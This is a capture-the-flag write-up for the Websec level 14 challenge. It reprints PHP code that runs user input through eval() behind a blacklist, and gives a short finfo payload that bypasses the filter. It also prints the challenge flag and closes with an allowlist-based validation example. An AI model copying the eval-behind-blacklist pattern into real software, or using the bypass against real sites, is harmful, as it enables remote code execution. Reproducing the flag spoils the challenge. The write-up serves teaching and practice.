Websec - Level 14 (looked at the solution)
Websec 14
<?php
ini_set('display_errors', 'on');
ini_set('error_reporting', E_ALL ^ E_DEPRECATED);
if (isset ($_POST['code']) && is_string ($_POST['code'])) {
    $code = substr ($_POST['code'], 0, 25);
} else {
    $code = "print('I hate PHP');";
}
?>
<!-- If I had to guess, I would say that the $flag is in sha1($flag). -->
<?php
$funcs_internal = get_defined_functions()['internal'];
/* lets allow some secure funcs here */
unset ($funcs_internal[array_search('strlen', $funcs_internal)]);
unset ($funcs_internal[array_search('print', $funcs_internal)]);
unset ($funcs_internal[array_search('strcmp', $funcs_internal)]);
unset ($funcs_internal[array_search('strncmp', $funcs_internal)]);
$funcs_extra = array ('eval', 'include', 'require', 'function');
$funny_chars = array ('\.', '\+', '-', '\*', '"', '`', '\[', '\]');
$variables = array ('_GET', '_POST', '_COOKIE', '_REQUEST', '_SERVER', '_FILES', '_ENV', 'HTTP_ENV_VARS', '_SESSION', 'GLOBALS');
$blacklist = array_merge($funcs_internal, $funcs_extra, $funny_chars, $variables);
$insecure = false;
foreach ($blacklist as $blacklisted) {
    if (preg_match ('/' . $blacklisted . '/im', $code)) {
        $insecure = true;
        break;
    }
}
if ($insecure) {
    echo 'Insecure code detected!';
} else {
    eval ($code);
}
?>
Solution
- It can be solved using finfo.
echo new finfo(0,'/');
- Flag
WEBSEC{that_must_have_been_some_nifty_php_trick_you_had_there}
- Besides finfo, there is also a solution that uses the NOT operation.
- jeonyoungsin.tistory.com/982
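
The filter above blacklists internal function names, a few keywords, characters and superglobals, and the `finfo` line contains none of them. As a contrast, here is an added example (not the challenge's or the author's code) that validates the input against an allowlist of PHP tokens; the constant names, `is_allowed()` and the sample list are assumptions made for this sketch.

```php
<?php
// Added example: allowlist validation with PHP's tokenizer instead of a
// substring blacklist. All names below are hypothetical, chosen for this sketch.
const ALLOWED_CALLS  = ['strlen', 'strcmp', 'strncmp'];
const ALLOWED_TOKENS = [T_OPEN_TAG, T_WHITESPACE, T_PRINT, T_STRING,
                        T_LNUMBER, T_CONSTANT_ENCAPSED_STRING];
const ALLOWED_CHARS  = ['(', ')', ',', ';'];

function is_allowed(string $code): bool
{
    // token_get_all() needs an opening tag to lex the input as PHP.
    foreach (token_get_all('<?php ' . $code) as $tok) {
        if (is_string($tok)) {                       // one-character token
            if (!in_array($tok, ALLOWED_CHARS, true)) {
                return false;
            }
            continue;
        }
        [$id, $text] = $tok;
        // Anything not listed (T_NEW, T_ECHO, T_VARIABLE, T_EVAL, ...) is refused.
        if (!in_array($id, ALLOWED_TOKENS, true)) {
            return false;
        }
        // A bare identifier must be one of the permitted function names.
        if ($id === T_STRING && !in_array(strtolower($text), ALLOWED_CALLS, true)) {
            return false;
        }
    }
    return true;
}

// Constructed samples: the challenge's default code, a permitted call,
// and the finfo line from the solution above.
$samples = [
    "print('I hate PHP');",
    "print(strlen('abc'));",
    "echo new finfo(0,'/');",
];
foreach ($samples as $code) {
    printf("%-26s %s\n", $code, is_allowed($code) ? 'allowed' : 'rejected');
}
```

Because the check works on token types rather than substrings, class instantiation, variables and language constructs that were never enumerated are refused by default.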
This post is licensed under CC BY 4.0 by the author.